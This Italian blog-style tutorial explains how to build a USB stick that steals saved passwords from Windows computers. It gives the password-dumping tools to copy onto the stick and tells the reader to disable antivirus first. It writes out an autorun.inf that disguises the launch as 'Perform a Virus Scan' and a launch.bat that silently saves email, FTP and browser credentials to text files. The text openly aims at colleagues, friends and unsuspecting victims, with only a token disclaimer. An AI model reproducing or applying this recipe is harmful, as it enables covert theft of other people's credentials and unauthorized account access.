Come hackerare le password attraverso una pendrive USB


Oggi vi mostreremo come ottenere quasi ogni tipo di password memorizzata su un PC con sistema operativo Windows.

Come sappiamo, Windows memorizza la maggior parte delle password che usiamo giornalmente, come ad esempio le password nei programmi di gestione delle e-mai, le password degli account FTP, quelle memorizzate sui  Browser Internet come IE, Chrome e Firefox ecc.

Esistono numerosi tool che ci permettono di recuperare queste informazioni memorizzate, utilizzando gli strumenti adatti possiamo creare il nostro sistema di hacking portatile che ci permetterà di catturare in un lampo le informazioni personali di colleghi/amici (ovviamente questi strumenti sono da utilizzarsi solo per scopi informativi e ludici).

Avremo bisogno dei seguenti tool:

Mail PassView: è un’utility che permette di recuperare gli account e le relative password di software come Outlook, Thunderbird, Incredimail, Eudora e molti altri.

IE Passview: permette di rivelare le password memorizzate da Internet Explorer. Supporta il browser fin dalla versione 4.0.

Protected Storage PassView: permette di recuperare le password criptate dei moduli di autocompletamento di Internet Explorer.

PasswordFox: è una piccola utility che vi permette di visualizzare i nomi utenti e le password memorizzati da Mozilla Firefox. Di default PasswordFox visualizza le password memorizzate nel profilo attuale, potete comunque scegliere di visualizzare le password di qualsiasi altro profilo.

Ecco una procedura passo passo per creare la vostra pendrive di hacking:

NOTA: È necessario disabilitare temporaneamente l’antivirus prima di seguire i seguenti passi.

  1. Scaricate tutti gli strumenti citati in precedenza, estraeteli e copiate soltanto i file in formato .exe sulla pendrive.
  2. Create un file attraverso il Blocco Note con il seguente contenuto:
    open=launch.bat 
    ACTION= Perform a Virus Scan
    Salvatelo col nome autorun.inf.
  3. Create un altro file con il Blocco note con il seguente contenuto:
    start mailpv.exe /stext mailpv.txt
    start iepv.exe /stext iepv.txt
    start pspv.exe /stext pspv.txt
    start passwordfox.exe /stext passwordfox.txt
    Salvatelo col nome launch.bat.
  4. Copiate i due file appena creati sulla pendrive insieme ai file .exe

La pendrive è dunque pronta per fare il suo lavoro e rubare le password dai computer dei poveri malcapitati.

Basterà inserire la pendrive ed attendere che la finestra di autorun venga visualizzata, quindi selezionare la prima opzione ed attendere un paio di secondi affinché le applicazioni facciano il loro dovere e memorizzino i dati su dei file di testo.

Rimuovete infine la pendrive per consultare sul vostro computer i dati che avete ottenuto, ovviamente questo metodo funziona solo se i dati sono memorizzati sul computer e non in cloud.

Se questo articolo vi è piaciuto condividetelo e diteci la vostra, alla prossima!


Related posts